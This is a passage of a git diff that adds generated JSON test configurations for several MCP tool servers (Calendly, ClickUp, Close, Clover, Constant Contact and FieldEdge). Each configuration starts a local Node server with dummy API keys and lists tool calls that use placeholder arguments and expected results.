"list_event_types:empty-page_token": { + "args": { + "count": 50, + "active": true, + "page_token": "" + }, + "expect": "exists" + }, + "get_availability": { + "args": { + "event_type_uuid": "test-id-123", + "start_time": "test_value", + "end_time": "test_value" + }, + "expect": "content && content.length > 0" + }, + "list_invitees": { + "args": { + "event_uuid": "test-id-123", + "count": 50, + "status": "active", + "page_token": "test_value" + }, + "expect": "content && content.length > 0" + }, + "list_invitees:empty-status": { + "args": { + "event_uuid": "test-id-123", + "count": 50, + "status": "", + "page_token": "test_value" + }, + "expect": "exists" + }, + "list_invitees:empty-page_token": { + "args": { + "event_uuid": "test-id-123", + "count": 50, + "status": "active", + "page_token": "" + }, + "expect": "exists" + }, + "get_user": { + "args": {}, + "expect": "content && content.length > 0" + } + }, + "resources": {}, + "prompts": {}, + "timeout": 30000 + } +} \ No newline at end of file diff --git a/factory-tools/test-configs/calendly.json b/factory-tools/test-configs/calendly.json new file mode 100644 index 0000000..eca4b20 --- /dev/null +++ b/factory-tools/test-configs/calendly.json @@ -0,0 +1,11 @@ +{ + "server": { + "command": "node", + "args": [ + "/Users/jakeshore/.clawdbot/workspace/mcp-diagrams/mcp-servers/calendly/dist/index.js" + ], + "env": { + "CALENDLY_API_KEY": "factory_discovery_dummy" + } + } +} \ No newline at end of file diff --git a/factory-tools/test-configs/clickup-tests.json b/factory-tools/test-configs/clickup-tests.json new file mode 100644 index 0000000..764c5d8 --- /dev/null +++ b/factory-tools/test-configs/clickup-tests.json @@ -0,0 +1,300 @@ +{ + "server": { + "command": "node", + "args": [ + "/Users/jakeshore/.clawdbot/workspace/mcp-diagrams/mcp-servers/clickup/dist/index.js" + ], + "env": { + "CLICKUP_API_KEY": "factory_discovery_dummy" + } + }, + "tests": { + "tools": { + "list_spaces": { + "args": { + "team_id": "test-id-123", + "archived": true + }, + "expect": "content && content.length > 0" + }, + "list_lists": { + "args": { + "folder_id": "test-id-123", + "space_id": "test-id-123", + "archived": true + }, + "expect": "content && content.length > 0" + }, + "list_lists:empty-folder_id": { + "args": { + "folder_id": "", + "space_id": "test-id-123", + "archived": true + }, + "expect": "exists" + }, + "list_lists:empty-space_id": { + "args": { + "folder_id": "test-id-123", + "space_id": "", + "archived": true + }, + "expect": "exists" + }, + "list_tasks": { + "args": { + "list_id": "test-id-123", + "archived": true, + "page": 50, + "order_by": "id", + "reverse": true, + "subtasks": true, + "include_closed": true, + "statuses": [], + "assignees": [] + }, + "expect": "content && content.length > 0" + }, + "list_tasks:empty-order_by": { + "args": { + "list_id": "test-id-123", + "archived": true, + "page": 50, + "order_by": "", + "reverse": true, + "subtasks": true, + "include_closed": true, + "statuses": [], + "assignees": [] + }, + "expect": "exists" + }, + "get_task": { + "args": { + "task_id": "test-id-123", + "include_subtasks": true + }, + "expect": "content && content.length > 0" + }, + "create_task": { + "args": { + "list_id": "test-id-123", + "name": "Test Name", + "description": "test_value", + "assignees": [], + "tags": [], + "status": "test_value", + "priority": 1, + "due_date": 50, + "start_date": 50, + "time_estimate": 50, + "parent": "test_value" + }, + "expect": "content && content.length > 0" + }, + "create_task:empty-description": { + "args": { + "list_id": "test-id-123", + "name": "Test Name", + "description": "", + "assignees": [], + "tags": [], + "status": "test_value", + "priority": 1, + "due_date": 50, + "start_date": 50, + "time_estimate": 50, + "parent": "test_value" + }, + "expect": "exists" + }, + "create_task:empty-status": { + "args": { + "list_id": "test-id-123", + "name": "Test Name", + "description": "test_value", + "assignees": [], + "tags": [], + "status": "", + "priority": 1, + "due_date": 50, + "start_date": 50, + "time_estimate": 50, + "parent": "test_value" + }, + "expect": "exists" + }, + "create_task:empty-parent": { + "args": { + "list_id": "test-id-123", + "name": "Test Name", + "description": "test_value", + "assignees": [], + "tags": [], + "status": "test_value", + "priority": 1, + "due_date": 50, + "start_date": 50, + "time_estimate": 50, + "parent": "" + }, + "expect": "exists" + }, + "update_task": { + "args": { + "task_id": "test-id-123", + "name": "Test Name", + "description": "test_value", + "status": "test_value", + "priority": 1, + "due_date": 50, + "start_date": 50, + "time_estimate": 50, + "assignees_add": [], + "assignees_remove": [], + "archived": true + }, + "expect": "content && content.length > 0" + }, + "update_task:empty-name": { + "args": { + "task_id": "test-id-123", + "name": "", + "description": "test_value", + "status": "test_value", + "priority": 1, + "due_date": 50, + "start_date": 50, + "time_estimate": 50, + "assignees_add": [], + "assignees_remove": [], + "archived": true + }, + "expect": "exists" + }, + "update_task:empty-description": { + "args": { + "task_id": "test-id-123", + "name": "Test Name", + "description": "", + "status": "test_value", + "priority": 1, + "due_date": 50, + "start_date": 50, + "time_estimate": 50, + "assignees_add": [], + "assignees_remove": [], + "archived": true + }, + "expect": "exists" + }, + "update_task:empty-status": { + "args": { + "task_id": "test-id-123", + "name": "Test Name", + "description": "test_value", + "status": "", + "priority": 1, + "due_date": 50, + "start_date": 50, + "time_estimate": 50, + "assignees_add": [], + "assignees_remove": [], + "archived": true + }, + "expect": "exists" + }, + "add_comment": { + "args": { + "task_id": "test-id-123", + "comment_text": "Sample content for testing", + "assignee": "test_value", + "notify_all": true + }, + "expect": "content && content.length > 0" + }, + "add_comment:empty-assignee": { + "args": { + "task_id": "test-id-123", + "comment_text": "Sample content for testing", + "assignee": "", + "notify_all": true + }, + "expect": "exists" + }, + "get_time_entries": { + "args": { + "team_id": "test-id-123", + "start_date": 50, + "end_date": 50, + "assignee": "test_value", + "task_id": "test-id-123", + "list_id": "test-id-123", + "space_id": "test-id-123", + "include_task_tags": true, + "include_location_names": true + }, + "expect": "content && content.length > 0" + }, + "get_time_entries:empty-assignee": { + "args": { + "team_id": "test-id-123", + "start_date": 50, + "end_date": 50, + "assignee": "", + "task_id": "test-id-123", + "list_id": "test-id-123", + "space_id": "test-id-123", + "include_task_tags": true, + "include_location_names": true + }, + "expect": "exists" + }, + "get_time_entries:empty-task_id": { + "args": { + "team_id": "test-id-123", + "start_date": 50, + "end_date": 50, + "assignee": "test_value", + "task_id": "", + "list_id": "test-id-123", + "space_id": "test-id-123", + "include_task_tags": true, + "include_location_names": true + }, + "expect": "exists" + }, + "get_time_entries:empty-list_id": { + "args": { + "team_id": "test-id-123", + "start_date": 50, + "end_date": 50, + "assignee": "test_value", + "task_id": "test-id-123", + "list_id": "", + "space_id": "test-id-123", + "include_task_tags": true, + "include_location_names": true + }, + "expect": "exists" + }, + "get_time_entries:empty-space_id": { + "args": { + "team_id": "test-id-123", + "start_date": 50, + "end_date": 50, + "assignee": "test_value", + "task_id": "test-id-123", + "list_id": "test-id-123", + "space_id": "", + "include_task_tags": true, + "include_location_names": true + }, + "expect": "exists" + } + }, + "resources": {}, + "prompts": {}, + "timeout": 30000 + } +} \ No newline at end of file diff --git a/factory-tools/test-configs/clickup.json b/factory-tools/test-configs/clickup.json new file mode 100644 index 0000000..e646140 --- /dev/null +++ b/factory-tools/test-configs/clickup.json @@ -0,0 +1,11 @@ +{ + "server": { + "command": "node", + "args": [ + "/Users/jakeshore/.clawdbot/workspace/mcp-diagrams/mcp-servers/clickup/dist/index.js" + ], + "env": { + "CLICKUP_API_KEY": "factory_discovery_dummy" + } + } +} \ No newline at end of file diff --git a/factory-tools/test-configs/close-tests.json b/factory-tools/test-configs/close-tests.json new file mode 100644 index 0000000..8c527ce --- /dev/null +++ b/factory-tools/test-configs/close-tests.json @@ -0,0 +1,554 @@ +{ + "server": { + "command": "node", + "args": [ + "/Users/jakeshore/.clawdbot/workspace/mcp-diagrams/mcp-servers/close/dist/index.js" + ], + "env": { + "CLOSE_API_KEY": "factory_discovery_dummy" + } + }, + "tests": { + "tools": { + "list_leads": { + "args": { + "query": "test query", + "_limit": 50, + "_skip": 50, + "_fields": "test_value" + }, + "expect": "content && content.length > 0" + }, + "list_leads:empty-query": { + "args": { + "query": "", + "_limit": 50, + "_skip": 50, + "_fields": "test_value" + }, + "expect": "exists" + }, + "list_leads:empty-_fields": { + "args": { + "query": "test query", + "_limit": 50, + "_skip": 50, + "_fields": "" + }, + "expect": "exists" + }, + "get_lead": { + "args": { + "lead_id": "test-id-123" + }, + "expect": "content && content.length > 0" + }, + "create_lead": { + "args": { + "name": "Test Name", + "url": "https://example.com", + "description": "test_value", + "status_id": "test-id-123", + "contacts": [], + "addresses": [], + "custom": {} + }, + "expect": "content && content.length > 0" + }, + "create_lead:empty-url": { + "args": { + "name": "Test Name", + "url": "", + "description": "test_value", + "status_id": "test-id-123", + "contacts": [], + "addresses": [], + "custom": {} + }, + "expect": "exists" + }, + "create_lead:empty-description": { + "args": { + "name": "Test Name", + "url": "https://example.com", + "description": "", + "status_id": "test-id-123", + "contacts": [], + "addresses": [], + "custom": {} + }, + "expect": "exists" + }, + "create_lead:empty-status_id": { + "args": { + "name": "Test Name", + "url": "https://example.com", + "description": "test_value", + "status_id": "", + "contacts": [], + "addresses": [], + "custom": {} + }, + "expect": "exists" + }, + "update_lead": { + "args": { + "lead_id": "test-id-123", + "name": "Test Name", + "url": "https://example.com", + "description": "test_value", + "status_id": "test-id-123", + "custom": {} + }, + "expect": "content && content.length > 0" + }, + "update_lead:empty-name": { + "args": { + "lead_id": "test-id-123", + "name": "", + "url": "https://example.com", + "description": "test_value", + "status_id": "test-id-123", + "custom": {} + }, + "expect": "exists" + }, + "update_lead:empty-url": { + "args": { + "lead_id": "test-id-123", + "name": "Test Name", + "url": "", + "description": "test_value", + "status_id": "test-id-123", + "custom": {} + }, + "expect": "exists" + }, + "update_lead:empty-description": { + "args": { + "lead_id": "test-id-123", + "name": "Test Name", + "url": "https://example.com", + "description": "", + "status_id": "test-id-123", + "custom": {} + }, + "expect": "exists" + }, + "update_lead:empty-status_id": { + "args": { + "lead_id": "test-id-123", + "name": "Test Name", + "url": "https://example.com", + "description": "test_value", + "status_id": "", + "custom": {} + }, + "expect": "exists" + }, + "list_opportunities": { + "args": { + "lead_id": "test-id-123", + "status_id": "test-id-123", + "user_id": "test-id-123", + "_limit": 50, + "_skip": 50 + }, + "expect": "content && content.length > 0" + }, + "list_opportunities:empty-lead_id": { + "args": { + "lead_id": "", + "status_id": "test-id-123", + "user_id": "test-id-123", + "_limit": 50, + "_skip": 50 + }, + "expect": "exists" + }, + "list_opportunities:empty-status_id": { + "args": { + "lead_id": "test-id-123", + "status_id": "", + "user_id": "test-id-123", + "_limit": 50, + "_skip": 50 + }, + "expect": "exists" + }, + "list_opportunities:empty-user_id": { + "args": { + "lead_id": "test-id-123", + "status_id": "test-id-123", + "user_id": "", + "_limit": 50, + "_skip": 50 + }, + "expect": "exists" + }, + "create_opportunity": { + "args": { + "lead_id": "test-id-123", + "status_id": "test-id-123", + "value": 50, + "value_period": "test_value", + "confidence": 50, + "note": "test_value", + "date_won": "test_value" + }, + "expect": "content && content.length > 0" + }, + "create_opportunity:empty-status_id": { + "args": { + "lead_id": "test-id-123", + "status_id": "", + "value": 50, + "value_period": "test_value", + "confidence": 50, + "note": "test_value", + "date_won": "test_value" + }, + "expect": "exists" + }, + "create_opportunity:empty-value_period": { + "args": { + "lead_id": "test-id-123", + "status_id": "test-id-123", + "value": 50, + "value_period": "", + "confidence": 50, + "note": "test_value", + "date_won": "test_value" + }, + "expect": "exists" + }, + "create_opportunity:empty-note": { + "args": { + "lead_id": "test-id-123", + "status_id": "test-id-123", + "value": 50, + "value_period": "test_value", + "confidence": 50, + "note": "", + "date_won": "test_value" + }, + "expect": "exists" + }, + "create_opportunity:empty-date_won": { + "args": { + "lead_id": "test-id-123", + "status_id": "test-id-123", + "value": 50, + "value_period": "test_value", + "confidence": 50, + "note": "test_value", + "date_won": "" + }, + "expect": "exists" + }, + "create_activity": { + "args": { + "activity_type": "test_value", + "lead_id": "test-id-123", + "contact_id": "test-id-123", + "user_id": "test-id-123", + "note": "test_value", + "subject": "test_value", + "status": "test_value", + "direction": "test_value", + "duration": 50, + "date_created": "test_value" + }, + "expect": "content && content.length > 0" + }, + "create_activity:empty-contact_id": { + "args": { + "activity_type": "test_value", + "lead_id": "test-id-123", + "contact_id": "", + "user_id": "test-id-123", + "note": "test_value", + "subject": "test_value", + "status": "test_value", + "direction": "test_value", + "duration": 50, + "date_created": "test_value" + }, + "expect": "exists" + }, + "create_activity:empty-user_id": { + "args": { + "activity_type": "test_value", + "lead_id": "test-id-123", + "contact_id": "test-id-123", + "user_id": "", + "note": "test_value", + "subject": "test_value", + "status": "test_value", + "direction": "test_value", + "duration": 50, + "date_created": "test_value" + }, + "expect": "exists" + }, + "create_activity:empty-note": { + "args": { + "activity_type": "test_value", + "lead_id": "test-id-123", + "contact_id": "test-id-123", + "user_id": "test-id-123", + "note": "", + "subject": "test_value", + "status": "test_value", + "direction": "test_value", + "duration": 50, + "date_created": "test_value" + }, + "expect": "exists" + }, + "create_activity:empty-subject": { + "args": { + "activity_type": "test_value", + "lead_id": "test-id-123", + "contact_id": "test-id-123", + "user_id": "test-id-123", + "note": "test_value", + "subject": "", + "status": "test_value", + "direction": "test_value", + "duration": 50, + "date_created": "test_value" + }, + "expect": "exists" + }, + "create_activity:empty-status": { + "args": { + "activity_type": "test_value", + "lead_id": "test-id-123", + "contact_id": "test-id-123", + "user_id": "test-id-123", + "note": "test_value", + "subject": "test_value", + "status": "", + "direction": "test_value", + "duration": 50, + "date_created": "test_value" + }, + "expect": "exists" + }, + "create_activity:empty-direction": { + "args": { + "activity_type": "test_value", + "lead_id": "test-id-123", + "contact_id": "test-id-123", + "user_id": "test-id-123", + "note": "test_value", + "subject": "test_value", + "status": "test_value", + "direction": "", + "duration": 50, + "date_created": "test_value" + }, + "expect": "exists" + }, + "create_activity:empty-date_created": { + "args": { + "activity_type": "test_value", + "lead_id": "test-id-123", + "contact_id": "test-id-123", + "user_id": "test-id-123", + "note": "test_value", + "subject": "test_value", + "status": "test_value", + "direction": "test_value", + "duration": 50, + "date_created": "" + }, + "expect": "exists" + }, + "list_tasks": { + "args": { + "lead_id": "test-id-123", + "assigned_to": "test_value", + "is_complete": true, + "_type": "test_value", + "_limit": 50, + "_skip": 50 + }, + "expect": "content && content.length > 0" + }, + "list_tasks:empty-lead_id": { + "args": { + "lead_id": "", + "assigned_to": "test_value", + "is_complete": true, + "_type": "test_value", + "_limit": 50, + "_skip": 50 + }, + "expect": "exists" + }, + "list_tasks:empty-assigned_to": { + "args": { + "lead_id": "test-id-123", + "assigned_to": "", + "is_complete": true, + "_type": "test_value", + "_limit": 50, + "_skip": 50 + }, + "expect": "exists" + }, + "list_tasks:empty-_type": { + "args": { + "lead_id": "test-id-123", + "assigned_to": "test_value", + "is_complete": true, + "_type": "", + "_limit": 50, + "_skip": 50 + }, + "expect": "exists" + }, + "create_task": { + "args": { + "lead_id": "test-id-123", + "assigned_to": "test_value", + "text": "Sample content for testing", + "date": "test_value", + "is_complete": true + }, + "expect": "content && content.length > 0" + }, + "create_task:empty-assigned_to": { + "args": { + "lead_id": "test-id-123", + "assigned_to": "", + "text": "Sample content for testing", + "date": "test_value", + "is_complete": true + }, + "expect": "exists" + }, + "create_task:empty-date": { + "args": { + "lead_id": "test-id-123", + "assigned_to": "test_value", + "text": "Sample content for testing", + "date": "", + "is_complete": true + }, + "expect": "exists" + }, + "send_email": { + "args": { + "lead_id": "test-id-123", + "contact_id": "test-id-123", + "to": [], + "cc": [], + "bcc": [], + "subject": "test_value", + "body_text": "Sample content for testing", + "body_html": "test_value", + "status": "test_value", + "template_id": "test-id-123" + }, + "expect": "content && content.length > 0" + }, + "send_email:empty-contact_id": { + "args": { + "lead_id": "test-id-123", + "contact_id": "", + "to": [], + "cc": [], + "bcc": [], + "subject": "test_value", + "body_text": "Sample content for testing", + "body_html": "test_value", + "status": "test_value", + "template_id": "test-id-123" + }, + "expect": "exists" + }, + "send_email:empty-body_text": { + "args": { + "lead_id": "test-id-123", + "contact_id": "test-id-123", + "to": [], + "cc": [], + "bcc": [], + "subject": "test_value", + "body_text": "", + "body_html": "test_value", + "status": "test_value", + "template_id": "test-id-123" + }, + "expect": "exists" + }, + "send_email:empty-body_html": { + "args": { + "lead_id": "test-id-123", + "contact_id": "test-id-123", + "to": [], + "cc": [], + "bcc": [], + "subject": "test_value", + "body_text": "Sample content for testing", + "body_html": "", + "status": "test_value", + "template_id": "test-id-123" + }, + "expect": "exists" + }, + "send_email:empty-status": { + "args": { + "lead_id": "test-id-123", + "contact_id": "test-id-123", + "to": [], + "cc": [], + "bcc": [], + "subject": "test_value", + "body_text": "Sample content for testing", + "body_html": "test_value", + "status": "", + "template_id": "test-id-123" + }, + "expect": "exists" + }, + "send_email:empty-template_id": { + "args": { + "lead_id": "test-id-123", + "contact_id": "test-id-123", + "to": [], + "cc": [], + "bcc": [], + "subject": "test_value", + "body_text": "Sample content for testing", + "body_html": "test_value", + "status": "test_value", + "template_id": "" + }, + "expect": "exists" + }, + "list_statuses": { + "args": { + "type": "test_value" + }, + "expect": "content && content.length > 0" + }, + "list_statuses:empty-type": { + "args": { + "type": "" + }, + "expect": "exists" + }, + "list_users": { + "args": {}, + "expect": "content && content.length > 0" + } + }, + "resources": {}, + "prompts": {}, + "timeout": 30000 + } +} \ No newline at end of file diff --git a/factory-tools/test-configs/close.json b/factory-tools/test-configs/close.json new file mode 100644 index 0000000..3609e6c --- /dev/null +++ b/factory-tools/test-configs/close.json @@ -0,0 +1,11 @@ +{ + "server": { + "command": "node", + "args": [ + "/Users/jakeshore/.clawdbot/workspace/mcp-diagrams/mcp-servers/close/dist/index.js" + ], + "env": { + "CLOSE_API_KEY": "factory_discovery_dummy" + } + } +} \ No newline at end of file diff --git a/factory-tools/test-configs/clover-tests.json b/factory-tools/test-configs/clover-tests.json new file mode 100644 index 0000000..16db2c9 --- /dev/null +++ b/factory-tools/test-configs/clover-tests.json @@ -0,0 +1,217 @@ +{ + "server": { + "command": "node", + "args": [ + "/Users/jakeshore/.clawdbot/workspace/mcp-diagrams/mcp-servers/clover/dist/index.js" + ], + "env": { + "CLOVER_API_KEY": "factory_discovery_dummy", + "CLOVER_MERCHANT_ID": "factory_discovery_dummy", + "CLOVER_REGION": "factory_discovery_dummy", + "CLOVER_SANDBOX": "factory_discovery_dummy" + } + }, + "tests": { + "tools": { + "list_orders": { + "args": { + "limit": 50, + "offset": 50, + "filter": "test_value", + "expand": "test_value" + }, + "expect": "content && content.length > 0" + }, + "list_orders:empty-filter": { + "args": { + "limit": 50, + "offset": 50, + "filter": "", + "expand": "test_value" + }, + "expect": "exists" + }, + "list_orders:empty-expand": { + "args": { + "limit": 50, + "offset": 50, + "filter": "test_value", + "expand": "" + }, + "expect": "exists" + }, + "get_order": { + "args": { + "order_id": "test-id-123", + "expand": "test_value" + }, + "expect": "content && content.length > 0" + }, + "get_order:empty-expand": { + "args": { + "order_id": "test-id-123", + "expand": "" + }, + "expect": "exists" + }, + "create_order": { + "args": { + "state": "test_value", + "title": "test_value", + "note": "test_value", + "order_type_id": "test-id-123", + "line_items": [] + }, + "expect": "content && content.length > 0" + }, + "create_order:empty-state": { + "args": { + "state": "", + "title": "test_value", + "note": "test_value", + "order_type_id": "test-id-123", + "line_items": [] + }, + "expect": "exists" + }, + "create_order:empty-title": { + "args": { + "state": "test_value", + "title": "", + "note": "test_value", + "order_type_id": "test-id-123", + "line_items": [] + }, + "expect": "exists" + }, + "create_order:empty-note": { + "args": { + "state": "test_value", + "title": "test_value", + "note": "", + "order_type_id": "test-id-123", + "line_items": [] + }, + "expect": "exists" + }, + "create_order:empty-order_type_id": { + "args": { + "state": "test_value", + "title": "test_value", + "note": "test_value", + "order_type_id": "", + "line_items": [] + }, + "expect": "exists" + }, + "list_items": { + "args": { + "limit": 50, + "offset": 50, + "filter": "test_value", + "expand": "test_value" + }, + "expect": "content && content.length > 0" + }, + "list_items:empty-filter": { + "args": { + "limit": 50, + "offset": 50, + "filter": "", + "expand": "test_value" + }, + "expect": "exists" + }, + "list_items:empty-expand": { + "args": { + "limit": 50, + "offset": 50, + "filter": "test_value", + "expand": "" + }, + "expect": "exists" + }, + "get_inventory": { + "args": { + "item_id": "test-id-123" + }, + "expect": "content && content.length > 0" + }, + "get_inventory:empty-item_id": { + "args": { + "item_id": "" + }, + "expect": "exists" + }, + "list_customers": { + "args": { + "limit": 50, + "offset": 50, + "filter": "test_value", + "expand": "test_value" + }, + "expect": "content && content.length > 0" + }, + "list_customers:empty-filter": { + "args": { + "limit": 50, + "offset": 50, + "filter": "", + "expand": "test_value" + }, + "expect": "exists" + }, + "list_customers:empty-expand": { + "args": { + "limit": 50, + "offset": 50, + "filter": "test_value", + "expand": "" + }, + "expect": "exists" + }, + "list_payments": { + "args": { + "limit": 50, + "offset": 50, + "filter": "test_value", + "expand": "test_value" + }, + "expect": "content && content.length > 0" + }, + "list_payments:empty-filter": { + "args": { + "limit": 50, + "offset": 50, + "filter": "", + "expand": "test_value" + }, + "expect": "exists" + }, + "list_payments:empty-expand": { + "args": { + "limit": 50, + "offset": 50, + "filter": "test_value", + "expand": "" + }, + "expect": "exists" + }, + "get_merchant": { + "args": { + "expand": "test_value" + }, + "expect": "content && content.length > 0" + }, + "get_merchant:empty-expand": { + "args": { + "expand": "" + }, + "expect": "exists" + } + }, + "resources": {}, + "prompts": {}, + "timeout": 30000 + } +} \ No newline at end of file diff --git a/factory-tools/test-configs/clover.json b/factory-tools/test-configs/clover.json new file mode 100644 index 0000000..cf9929e --- /dev/null +++ b/factory-tools/test-configs/clover.json @@ -0,0 +1,14 @@ +{ + "server": { + "command": "node", + "args": [ + "/Users/jakeshore/.clawdbot/workspace/mcp-diagrams/mcp-servers/clover/dist/index.js" + ], + "env": { + "CLOVER_API_KEY": "factory_discovery_dummy", + "CLOVER_MERCHANT_ID": "factory_discovery_dummy", + "CLOVER_REGION": "factory_discovery_dummy", + "CLOVER_SANDBOX": "factory_discovery_dummy" + } + } +} \ No newline at end of file diff --git a/factory-tools/test-configs/constant-contact-tests.json b/factory-tools/test-configs/constant-contact-tests.json new file mode 100644 index 0000000..693c15b --- /dev/null +++ b/factory-tools/test-configs/constant-contact-tests.json @@ -0,0 +1,367 @@ +{ + "server": { + "command": "node", + "args": [ + "/Users/jakeshore/.clawdbot/workspace/mcp-diagrams/mcp-servers/constant-contact/dist/index.js" + ], + "env": { + "CONSTANT_CONTACT_ACCESS_TOKEN": "factory_discovery_dummy" + } + }, + "tests": { + "tools": { + "list_contacts": { + "args": { + "status": "all", + "email": "test@example.com", + "lists": "test_value", + "segment_id": "test-id-123", + "limit": 50, + "include": "custom_fields", + "include_count": true, + "cursor": "test_value" + }, + "expect": "content && content.length > 0" + }, + "list_contacts:empty-status": { + "args": { + "status": "", + "email": "test@example.com", + "lists": "test_value", + "segment_id": "test-id-123", + "limit": 50, + "include": "custom_fields", + "include_count": true, + "cursor": "test_value" + }, + "expect": "exists" + }, + "list_contacts:empty-email": { + "args": { + "status": "all", + "email": "", + "lists": "test_value", + "segment_id": "test-id-123", + "limit": 50, + "include": "custom_fields", + "include_count": true, + "cursor": "test_value" + }, + "expect": "exists" + }, + "list_contacts:empty-lists": { + "args": { + "status": "all", + "email": "test@example.com", + "lists": "", + "segment_id": "test-id-123", + "limit": 50, + "include": "custom_fields", + "include_count": true, + "cursor": "test_value" + }, + "expect": "exists" + }, + "list_contacts:empty-segment_id": { + "args": { + "status": "all", + "email": "test@example.com", + "lists": "test_value", + "segment_id": "", + "limit": 50, + "include": "custom_fields", + "include_count": true, + "cursor": "test_value" + }, + "expect": "exists" + }, + "list_contacts:empty-include": { + "args": { + "status": "all", + "email": "test@example.com", + "lists": "test_value", + "segment_id": "test-id-123", + "limit": 50, + "include": "", + "include_count": true, + "cursor": "test_value" + }, + "expect": "exists" + }, + "list_contacts:empty-cursor": { + "args": { + "status": "all", + "email": "test@example.com", + "lists": "test_value", + "segment_id": "test-id-123", + "limit": 50, + "include": "custom_fields", + "include_count": true, + "cursor": "" + }, + "expect": "exists" + }, + "add_contact": { + "args": { + "email_address": "test@example.com", + "first_name": "Test Name", + "last_name": "Test Name", + "job_title": "test_value", + "company_name": "Test Name", + "phone_numbers": [], + "street_addresses": [], + "list_memberships": [], + "custom_fields": [], + "birthday_month": 50, + "birthday_day": 50, + "anniversary": "test_value", + "create_source": "Contact" + }, + "expect": "content && content.length > 0" + }, + "add_contact:empty-first_name": { + "args": { + "email_address": "test@example.com", + "first_name": "", + "last_name": "Test Name", + "job_title": "test_value", + "company_name": "Test Name", + "phone_numbers": [], + "street_addresses": [], + "list_memberships": [], + "custom_fields": [], + "birthday_month": 50, + "birthday_day": 50, + "anniversary": "test_value", + "create_source": "Contact" + }, + "expect": "exists" + }, + "add_contact:empty-last_name": { + "args": { + "email_address": "test@example.com", + "first_name": "Test Name", + "last_name": "", + "job_title": "test_value", + "company_name": "Test Name", + "phone_numbers": [], + "street_addresses": [], + "list_memberships": [], + "custom_fields": [], + "birthday_month": 50, + "birthday_day": 50, + "anniversary": "test_value", + "create_source": "Contact" + }, + "expect": "exists" + }, + "add_contact:empty-job_title": { + "args": { + "email_address": "test@example.com", + "first_name": "Test Name", + "last_name": "Test Name", + "job_title": "", + "company_name": "Test Name", + "phone_numbers": [], + "street_addresses": [], + "list_memberships": [], + "custom_fields": [], + "birthday_month": 50, + "birthday_day": 50, + "anniversary": "test_value", + "create_source": "Contact" + }, + "expect": "exists" + }, + "add_contact:empty-company_name": { + "args": { + "email_address": "test@example.com", + "first_name": "Test Name", + "last_name": "Test Name", + "job_title": "test_value", + "company_name": "", + "phone_numbers": [], + "street_addresses": [], + "list_memberships": [], + "custom_fields": [], + "birthday_month": 50, + "birthday_day": 50, + "anniversary": "test_value", + "create_source": "Contact" + }, + "expect": "exists" + }, + "add_contact:empty-anniversary": { + "args": { + "email_address": "test@example.com", + "first_name": "Test Name", + "last_name": "Test Name", + "job_title": "test_value", + "company_name": "Test Name", + "phone_numbers": [], + "street_addresses": [], + "list_memberships": [], + "custom_fields": [], + "birthday_month": 50, + "birthday_day": 50, + "anniversary": "", + "create_source": "Contact" + }, + "expect": "exists" + }, + "add_contact:empty-create_source": { + "args": { + "email_address": "test@example.com", + "first_name": "Test Name", + "last_name": "Test Name", + "job_title": "test_value", + "company_name": "Test Name", + "phone_numbers": [], + "street_addresses": [], + "list_memberships": [], + "custom_fields": [], + "birthday_month": 50, + "birthday_day": 50, + "anniversary": "test_value", + "create_source": "" + }, + "expect": "exists" + }, + "list_campaigns": { + "args": { + "limit": 50, + "before_date": "test_value", + "after_date": "test_value", + "cursor": "test_value" + }, + "expect": "content && content.length > 0" + }, + "list_campaigns:empty-before_date": { + "args": { + "limit": 50, + "before_date": "", + "after_date": "test_value", + "cursor": "test_value" + }, + "expect": "exists" + }, + "list_campaigns:empty-after_date": { + "args": { + "limit": 50, + "before_date": "test_value", + "after_date": "", + "cursor": "test_value" + }, + "expect": "exists" + }, + "list_campaigns:empty-cursor": { + "args": { + "limit": 50, + "before_date": "test_value", + "after_date": "test_value", + "cursor": "" + }, + "expect": "exists" + }, + "create_campaign": { + "args": { + "name": "Test Name", + "subject": "test_value", + "from_name": "Test Name", + "from_email": "test@example.com", + "reply_to_email": "test@example.com", + "html_content": "Sample content for testing", + "text_content": "Sample content for testing", + "format_type": 1, + "physical_address_in_footer": {} + }, + "expect": "content && content.length > 0" + }, + "create_campaign:empty-reply_to_email": { + "args": { + "name": "Test Name", + "subject": "test_value", + "from_name": "Test Name", + "from_email": "test@example.com", + "reply_to_email": "", + "html_content": "Sample content for testing", + "text_content": "Sample content for testing", + "format_type": 1, + "physical_address_in_footer": {} + }, + "expect": "exists" + }, + "create_campaign:empty-html_content": { + "args": { + "name": "Test Name", + "subject": "test_value", + "from_name": "Test Name", + "from_email": "test@example.com", + "reply_to_email": "test@example.com", + "html_content": "", + "text_content": "Sample content for testing", + "format_type": 1, + "physical_address_in_footer": {} + }, + "expect": "exists" + }, + "create_campaign:empty-text_content": { + "args": { + "name": "Test Name", + "subject": "test_value", + "from_name": "Test Name", + "from_email": "test@example.com", + "reply_to_email": "test@example.com", + "html_content": "Sample content for testing", + "text_content": "", + "format_type": 1, + "physical_address_in_footer": {} + }, + "expect": "exists" + }, + "list_lists": { + "args": { + "limit": 50, + "include_count": true, + "include_membership_count": "all", + "cursor": "test_value" + }, + "expect": "content && content.length > 0" + }, + "list_lists:empty-include_membership_count": { + "args": { + "limit": 50, + "include_count": true, + "include_membership_count": "", + "cursor": "test_value" + }, + "expect": "exists" + }, + "list_lists:empty-cursor": { + "args": { + "limit": 50, + "include_count": true, + "include_membership_count": "all", + "cursor": "" + }, + "expect": "exists" + }, + "add_to_list": { + "args": { + "list_id": "test-id-123", + "contact_ids": [] + }, + "expect": "content && content.length > 0" + }, + "get_campaign_stats": { + "args": { + "campaign_activity_id": "test-id-123" + }, + "expect": "content && content.length > 0" + } + }, + "resources": {}, + "prompts": {}, + "timeout": 30000 + } +} \ No newline at end of file diff --git a/factory-tools/test-configs/constant-contact.json b/factory-tools/test-configs/constant-contact.json new file mode 100644 index 0000000..5ae9af5 --- /dev/null +++ b/factory-tools/test-configs/constant-contact.json @@ -0,0 +1,11 @@ +{ + "server": { + "command": "node", + "args": [ + "/Users/jakeshore/.clawdbot/workspace/mcp-diagrams/mcp-servers/constant-contact/dist/index.js" + ], + "env": { + "CONSTANT_CONTACT_ACCESS_TOKEN": "factory_discovery_dummy" + } + } +} \ No newline at end of file diff --git a/factory-tools/test-configs/fieldedge-tests.json b/factory-tools/test-configs/fieldedge-tests.json new file mode 100644 index 0000000..d388cee --- /dev/null +++ b/factory-tools/test-configs/fieldedge-tests.json @@ -0,0 +1,370 @@ +{ + "server": { + "command": "node", + "args": [ + "/Users/jakeshore/.clawdbot/workspace/mcp-diagrams/mcp-servers/fieldedge/dist/index.js" + ], + "env": { + "FIELDEDGE_API_KEY": "factory_discovery_dummy", + 